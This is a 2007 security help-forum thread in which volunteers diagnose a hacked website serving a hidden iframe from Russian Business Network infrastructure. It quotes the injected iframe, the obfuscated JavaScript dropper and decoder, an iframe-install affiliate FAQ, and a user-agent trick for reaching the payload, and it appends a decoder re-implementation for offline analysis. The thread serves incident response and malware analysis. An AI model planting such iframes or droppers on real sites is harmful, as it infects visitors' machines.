Spyware Warrior Help with Spyware, Hijacking & Other Internet Nuisances
Elektra Newbie

Joined: 13 Jul 2007 Last Visit: 24 Jul 2007 Posts: 6 Location: USA
Posted: Fri Jul 13, 2007 5:12 pm Post subject: spam on my page?
OK, recently some of my friends who visited my site said that every time they went on it their firewall would go off. Well I figured out a couple of weeks ago what it was. On every "index.php" page (and one or two .htm/.html pages) this link would appear at the bottom of the page. I deleted it from every index page it appeared on. This afternoon it reappeared and I deleted it again.
But it's back for a THIRD time:
Code:
<iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
I searched up the IP, and found some sites that said it linked to a trojan virus. I really don't know what to do. Can anyone help?
suzi Site Admin

Joined: 27 Jul 2003 Last Visit: 25 May 2013 Posts: 10271 Location: sunny California
Posted: Fri Jul 13, 2007 6:41 pm
Elektra,
It would appear your website has been hacked. Somehow hackers gained access to it and added code to the pages.
Is your website on a shared server, sometimes called virtual hosting? Or do you have a dedicated server for your site?
Who is in charge of the server?
Also, if you are using a php program, like Wordpress, or a php forum, for example, and the programs are not updated to the latest versions, they can be hacked due to vulnerabilities in the software.
You should contact the webhosting company right away and explain what has been happening.
Unfortunately website hacking has become more and more common in the last year. Hackers will hack anything they can get into and use it for malicious purposes.
The IP address in that iframe link belongs to known internet criminals.
http://whois.domaintools.com/81.95.145.240
I can't get this page to load right now, but it tells the history of these criminals.
http://www.spamhaus.org/SBL/sbl.lasso?query=SBL43489
I will look at your site in my virtual machine and see if I can find any more info, but you need to contact your hosting company right away and tell them what happened. They should be able to help you secure your site, or secure their servers to prevent the hackers from getting back in.
Is it the site in your homepage link? If so, I would request you to remove the link from your profile because we don't want anyone clicking on it from here and getting infected with a trojan.
Thanks.
_________________
Former Microsoft MVP 2005-2009, Consumer Security
Please do not PM or Email me for personal support. Post in the Forums instead and we will all learn.
Elektra Newbie

Joined: 13 Jul 2007 Last Visit: 24 Jul 2007 Posts: 6 Location: USA
Posted: Fri Jul 13, 2007 6:54 pm
*headdesk* Hacked? Aghhh this sucks so much
OK, I will contact my web hosting company right away.
And umm, I'm not sure who's in charge of the server, how do I find that out?
And thanks for the links, I'll take a look at those
Elektra Newbie

Joined: 13 Jul 2007 Last Visit: 24 Jul 2007 Posts: 6 Location: USA
Posted: Fri Jul 13, 2007 7:33 pm
Quote:
Removal Procedure
As this is a known professional spam operation, it is important that all service to the Russian Business Network spam operation be terminated before this listing can be removed from the SBL. There can be no functioning web site, mail or DNS server still serving the spam operation in 81.95.144.0/20.
To have record SBL43489 (81.95.144.0/20) removed from the SBL, the Abuse/Security representative of RIPE (or the Internet Service Provider responsible for connectivity to 81.95.144.0/20) needs to contact the SBL Team to advise how the spam problem has been terminated.
So does this mean that I should delete my site until everything is sorted out?
suzi Site Admin

Joined: 27 Jul 2003 Last Visit: 25 May 2013 Posts: 10271 Location: sunny California
Posted: Fri Jul 13, 2007 7:47 pm
Unless you are paying for a virtual private server or have a dedicated server, the hosting company is responsible for the server, but you are responsible for keeping the applications updated, like if you have a blog or a forum.
Ask your hosting company what you should do, because it depends on how they work. I don't know that you should totally delete it, but the hosting company should tell you what to do. You, or they, might be able to block access to it while it gets cleaned up and secured.
Could you send me a PM with the URL again? I see you removed it from your profile, thanks for doing that. I actually went there with my good machine and I got firewall alerts, but no alerts from my AV. I want to check it again on my virtual machine.
Yes, having your website hacked really does suck, but it's happening to a lot of sites, I mean hundreds of thousands of sites.
I recommend you read this:
http://www.stopbadware.org/home/security
See section 5, "Hacking attacks to your site".
It talks about invisible iframes, which is what is on your site.
It happened to this guy, too. He explains it in his blog:
http://ethanzuckerman.com/blog/?p=1346
Good luck. If you need help explaining to your hosting company what's going on, let me know. I sometimes contact companies about getting hacked sites taken down and cleaned up.
_________________
Former Microsoft MVP 2005-2009, Consumer Security
Please do not PM or Email me for personal support. Post in the Forums instead and we will all learn.
Elektra Newbie

Joined: 13 Jul 2007 Last Visit: 24 Jul 2007 Posts: 6 Location: USA
Posted: Fri Jul 13, 2007 7:51 pm
Oh, well, I contacted them already, basically paraphrasing what I said here; I said I got hacked, of course. I also mentioned this site too.
The support e-mail said they usually get back within two hours, so maybe if they need more info or I need help I'll ask if you could also contact them.
I'm hosted at http://godaddy.com/
And thanks for the extra info!
suzi Site Admin

Joined: 27 Jul 2003 Last Visit: 25 May 2013 Posts: 10271 Location: sunny California
Posted: Fri Jul 13, 2007 7:52 pm
Oh, in the quote, they are talking about that IP address, not saying you should take down your site.
_________________
Former Microsoft MVP 2005-2009, Consumer Security
Please do not PM or Email me for personal support. Post in the Forums instead and we will all learn.
Elektra Newbie

Joined: 13 Jul 2007 Last Visit: 24 Jul 2007 Posts: 6 Location: USA
Posted: Fri Jul 13, 2007 8:01 pm
suzi wrote:
Oh, in the quote, they are talking about that IP address, not saying you should take down your site.
Ohh ok, I read it wrong then
olliver Expert Developer

Joined: 27 Jan 2006 Last Visit: 02 Dec 2010 Posts: 1157 Location: yes
Posted: Sat Jul 14, 2007 8:47 am Post subject: Re: spam on my page?
Elektra wrote:
Code:
<iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
I searched up the IP, and found some sites that said it linked to a trojan virus.
Elektra, as Suzi already pointed out, you had the pleasure of meeting one of the worst Russian criminal gangs under the umbrella of the "Russian Business Network". I've already seen several such hacked sites and they are often linked to Iframecash and similar "affiliate programmes":
Quote:
Q: What must I do if I want to work with iframeDOLLARS.biz partnership program?
A: 1. You must be registered here
2. You should put a short one line iframe code which will be given to you on your page(s). And our program will be installed to users in hidden iframe
Q: How much will I be paid per install?
A: We will pay you $80/1000 unique installs and more. It depends on your traffic volume
Q: Do you pay for unique or for all installs?
A: We pay for unique installs
Source: http ://iframedollars.biz/faq.php?lang=en
Well you get the idea, they make money off planting funky iframe sites, running exploits and having their victims' machines infested with all sorts of crapware. Some affiliates prefer finding vulnerable sites like yours rather than incorporating the iframe one-liner into their own sites, because it won't cost them *their* money if the site is taken down by the hosting company. As you may figure out yourself, complaining to iframedollars about the rogue affiliate won't get you anywhere...
Btw, it appears as if 81.95.145.240 is down:
Quote:
[olliver@bunkiten ~]$ traceroute 81.95.145.240
traceroute to 81.95.145.240 (81.95.145.240), 30 hops max, 40 byte packets
[...]
6 ffm-145-254-16-18.arcor-ip.net (145.254.16.18 ) 51.912 ms 49.654 ms 52.177 ms
7 cr02.frf02.pccwbtn.net (80.81.192.50) 54.275 ms 19.888 ms 22.627 ms
8 rbn.fe3-29.br02.ldn01.pccwbtn.net (63.218.52.114) 42.967 ms 44.472 ms 47.504 ms
9 * * *
10 * * *
11 * * *
12 * * *
13 * * *
14 * * *
15 * * *
[...]
looks like their upstream is no longer routing them
Olliver
_________________
Petcord netlabel :: Synflict post-digital arts :: Leftob audio cast
Each click on any of the links above will save the life of a cute kitty somewhere in the universe.
ld Warrior
Joined: 01 Mar 2005 Last Visit: 29 Jul 2010 Posts: 185
Posted: Sat Jul 14, 2007 3:31 pm
I'm not sure why a notepet wasn't able to reach the site but unfortunately I had no problem.
Code:
traceroute to 81.95.145.240 (81.95.145.240), 64 hops max, 40 byte packets
1 10.59.160.1 (10.59.160.1) 13.626 ms 10.822 ms 11.143 ms
2 ge5-0-nycmnyr-rtr4.nyc.rr.com (24.29.130.29) 9.604 ms 8.118 ms 7.105 ms
3 pos3-0-nycmnyr-rtr2.nyc.rr.com (24.29.130.41) 18.137 ms 8.266 ms 13.388 ms
4 pos3-0-nycmnya-rtr1.nyc.rr.com (24.29.97.29) 7.512 ms 10.283 ms 19.564 ms
5 tenge-2-0-0.nwrknjmd-rtr.nyc.rr.com (24.29.119.110) 9.185 ms 10.245 ms 8.807 ms
6 te-4-3.car1.Newark1.Level3.net (4.79.188.113) 11.442 ms 10.332 ms 7.941 ms
7 ae-1-51.bbr1.Newark1.Level3.net (4.68.99.1) 9.333 ms ae-1-53.bbr1.Newark1.Level3.net (4.68.99.65) 9.424 ms ae-1-55.bbr1.Newark1.Level3.net (4.68.99.129) 39.173 ms
8 ae-1-0.bbr1.London1.Level3.net (212.187.128.58) 74.461 ms 74.998 ms as-0-0.bbr2.London1.Level3.net (4.68.128.105) 76.434 ms
9 ae-21-54.car1.London1.Level3.net (4.68.116.111) 79.183 ms ae-21-52.car1.London1.Level3.net (4.68.116.47) 76.470 ms ae-21-54.car1.London1.Level3.net (4.68.116.111) 79.89 ms
10 84-45-24-53.c4l.co.uk (84.45.24.53) 76.718 ms 85.711 ms 75.556 ms
11 ringo-wolverine.c4l.co.uk (84.45.90.141) 79.357 ms 79.533 ms 82.597 ms
12 84.45.47.130 (84.45.47.130) 77.668 ms 85.400 ms 94.830 ms
13 gbit-eth-34-uk.sbttel.com (81.95.156.34) 127.744 ms 128.676 ms 139.458 ms
14 oc-3-sbttel.rbnnetwork.com (81.95.156.74) 135.95 ms 129.562 ms 132.172 ms
15 81.95.145.240 (81.95.145.240) 123.836 ms 125.157 ms 126.680 ms
I was also able to pull down the link in the iframe source which just contains some obfuscated JavaScript. I would say it is safe to say it is still very much alive and dangerous.
This does look like mpack. Basically they hack the webserver and try to add this line to all web files on the server. If it is shared hosting it may not be your site that is being exploited but due to poor security once they exploit one site they may be able to modify any site on that server.

Joined: 27 Jul 2003 Last Visit: 25 May 2013 Posts: 10271 Location: sunny California
|
JeanInMontana Warrior

Joined: 16 Jan 2005 Last Visit: 22 Dec 2008 Posts: 177 Location: South Central Montana, USA
Posted: Sat Jul 14, 2007 9:29 pm
I was going to suggest Essex hosting. ChrisRLG and his gang do nothing but help with this type of situation and monitor sites.
_________________
Hoax~Slayer * hpHosts * T.I.C. * Malwarebytes * A.S.A.P. Member 2004
olliver Expert Developer

Joined: 27 Jan 2006 Last Visit: 02 Dec 2010 Posts: 1157 Location: yes
Posted: Sun Jul 15, 2007 12:18 am
ld wrote:
I'm not sure why a notepet wasn't able to reach the site but unfortunately I had no problem.
That's quite easy to explain if you look at the route. That's your last hop before RBN:
84.45.47.130 (84.45.47.130) 77.668 ms 85.400 ms 94.830 ms
See how it differs from mine?
rbn.fe3-29.br02.ldn01.pccwbtn.net (63.218.52.114) 42.967 ms 44.472 ms 47.504 ms
That probably means that BTN, the upstream responsible for my route, acted responsibly and null-routed this malware source. That's astonishing because BTN is otherwise known as a spam-friendly ISP and hardly acts on any complaints. Anyway, your route differs as it goes via Level3 and C4l with 84.45.47.130 being their border router to RBN.
Quote:
I was also able to pull down the link in the iframe source which just contains some obfuscated java script. I would say it is safe to say it is still very much alive and dangerous.
From your perspective as a RoadRunner customer, for sure. From mine as a customer of Arcor (Germany), with the different routing, that's no longer true for this destination. Other IP addresses within this /24, however, are still reachable for me, too. I would think that if RBN had an axe to grind with me, they surely would ban my presumable IP addresses for their entire net, and not just that one server, wouldn't they?
Quote:
Basically they hack the webserver and try to add this line to all web files on the server. If it is shared hosting it may not be your site that is being exploited but due to poor security once they exploit one site they may be able to modify any site on that server.
Careful with "they": We do not know by whom this has been done and even for a rogue network we shouldn't assume collective punishment to be appropriate. I think it's safe to assume though that some rogue affiliates find this method of earning money more lucrative than putting the iframe code on the handful of sites they themselves own.
Olliver
_________________
Petcord netlabel :: Synflict post-digital arts :: Leftob audio cast
Each click on any of the links above will save the life of a cute kitty somewhere in the universe.
olliver Expert Developer

Joined: 27 Jan 2006 Last Visit: 02 Dec 2010 Posts: 1157 Location: yes
Posted: Sun Jul 15, 2007 12:28 am
suzi wrote:
That site is monitoring IPs and if you try to go there a second time, it says your IP is blocked. That's not terribly unusual either. Nice of them to not exploit you more than once.
Well it's the owner's bidniz and (s)he has to make sure to minimise the risk of unwanted visitors. In my case, however, the destination is unreachable, so I never got the chance to see that funny message. I'm going to try from another address later today and hope to be more successful.
Quote:
The OP here is getting some behind the scenes help with this in case anyone was wondering.
That's good news. Also this may be good evidence for the likes of Spamhaus, I'm sure they gladly accept more data for their ROKSO record of RBN.
Olliver
_________________
Petcord netlabel :: Synflict post-digital arts :: Leftob audio cast
Each click on any of the links above will save the life of a cute kitty somewhere in the universe.
olliver Expert Developer

Joined: 27 Jan 2006 Last Visit: 02 Dec 2010 Posts: 1157 Location: yes
Posted: Sun Jul 15, 2007 12:50 am
a notepet wrote:
I'm going to try from another address later today and hope to be more successful.
Lucky me, I was able to get through via another server. The exploit code requires Javascript, else nothing is happening. This is the source:
Quote:
<script language=JavaScript>function decipher(x){
var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
t=Array(63,36,35,27,14,52,8,48,5,49,0,0,0,0,0,0,9,1,11,44,30,10,21,57,39,13,38,19,18,20,7,61,56,55,24,47,42,12,23,29,28,62,22,0,0,0,0,0,0,46,45,54,50,6,4,37,53,2,59,15,58,51,16,32,33,40,3,26,60,41,34,31,25,17,43);
for(j=Math.ceil(l/b);j>0;j--){
r='';
for(i=Math.min(l,b);i>0;i--,l--){
w|=(t[x.charCodeAt(p++)-48])<<s;
if(s){
r+=String.fromCharCode(165^w&255);
w>>=8;s-=2}
else{s=6}
}
document.write(r)}
}
decipher("8Jxmy2Xd3JG9ENUQ3eI7ZNWpFKC7_HuvNzX7XSxJEcX56HtJ")</script>
(slight reformatting applied for better readability)
First part defines a decoding procedure which is run in the main part (with the encrypted string as argument). Debugging this code with Opera only gets me as far as:
Quote:
<localhost>
<html><body>test page</body></html>
Probably IE specific code. I may have to try again with a Windows Machine and IE, perhaps that'll be more successful.
Olliver
_________________
Petcord netlabel :: Synflict post-digital arts :: Leftob audio cast
Each click on any of the links above will save the life of a cute kitty somewhere in the universe.
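A stand-alone re-implementation of the decoding routine quoted above, added here as an example and not part of olliver's post: it reproduces the sample's lookup table, XOR key and argument so the payload can be recovered offline without letting `document.write()` run it in a browser. The function names `decipher` and `alphabet` and the alphabet recovery are my additions.

```javascript
// Added example, not olliver's code: a stand-alone re-implementation of the
// decipher() routine quoted above, so the hidden payload can be recovered
// offline instead of letting document.write() run it in a browser. TABLE,
// the XOR key 165 and the encoded string are copied from the quoted sample.
const TABLE = [63,36,35,27,14,52,8,48,5,49,0,0,0,0,0,0,9,1,11,44,30,10,21,57,39,13,38,19,
  18,20,7,61,56,55,24,47,42,12,23,29,28,62,22,0,0,0,0,0,0,46,45,54,50,6,4,37,53,2,59,15,
  58,51,16,32,33,40,3,26,60,41,34,31,25,17,43];
const XOR_KEY = 165;
const SAMPLE = '8Jxmy2Xd3JG9ENUQ3eI7ZNWpFKC7_HuvNzX7XSxJEcX56HtJ';

// The scheme is a custom base64: each character is looked up in TABLE
// (index = charCode - 48) to give a 6-bit value; four values are packed
// little-endian into 24 bits and emitted as three bytes, each XORed with 165.
// The original's 1024-character chunking only batches document.write()
// calls and does not change the output, so it is dropped here.
function decipher(encoded) {
  let out = '';
  let acc = 0;     // bit accumulator (the sample's w)
  let pending = 0; // bits already waiting in acc (the sample's s)
  for (let i = 0; i < encoded.length; i++) {
    const idx = encoded.charCodeAt(i) - 48;
    if (idx < 0 || idx >= TABLE.length) throw new Error('character outside the alphabet at offset ' + i);
    acc |= TABLE[idx] << pending;
    if (pending) {
      out += String.fromCharCode(XOR_KEY ^ (acc & 255));
      acc >>= 8;
      pending -= 2;
    } else {
      pending = 6;
    }
  }
  return out;
}

// Recover which symbol encodes each 6-bit value (the alphabet the encoder
// used). Several indices map to 0; '_' is the one the sample uses.
function alphabet() {
  const syms = new Array(64).fill('?');
  TABLE.forEach((v, i) => {
    const c = String.fromCharCode(i + 48);
    if (v !== 0 || c === '_') syms[v] = c;
  });
  return syms.join('');
}

console.log(decipher(SAMPLE)); // the markup the page writes for a non-IE visitor
```

Running it with `node` prints the same "test page" markup that olliver's Opera session showed, which confirms that the non-IE branch of the page is a decoy and that the real payload is only served once the user-agent check discussed below passes.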
ld Warrior
Joined: 01 Mar 2005 Last Visit: 29 Jul 2010 Posts: 185
Posted: Sun Jul 15, 2007 8:02 am
You are right, it does look at the User Agent string of your browser. Change it to something like "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" and you will get much different results. The blocks seem to be on a page by page basis. This obfuscated JavaScript links to several files on another server on the same /16. When I tried to get a directory listing I got the message that I was blocked. Tried from a different IP and got the same JavaScript I'm analyzing now (so no directory listing, it spit index.php at me). Back to my original IP that is blocked, I grabbed the .jar file and had no problem getting it. The IP blocking is just to keep you from executing the same script multiple times but won't keep you from getting the other dangerous files you have not yet received... When you decode that JavaScript it starts by loading a Java applet and then has a decent size JavaScript to run. Going by the applet's name it sounds like it is an exploit for MS0-311 which deals with a bug in the Microsoft virtual machine and is from 2003. At the very end you see a link to a page ms07-017.php whose name sounds like a GDI exploit. There is a lot more going on in there; those are just the things that stand out.
smartBlue Style © 2002 Smartor
Powered by phpBB © 2001, 2002 phpBB Group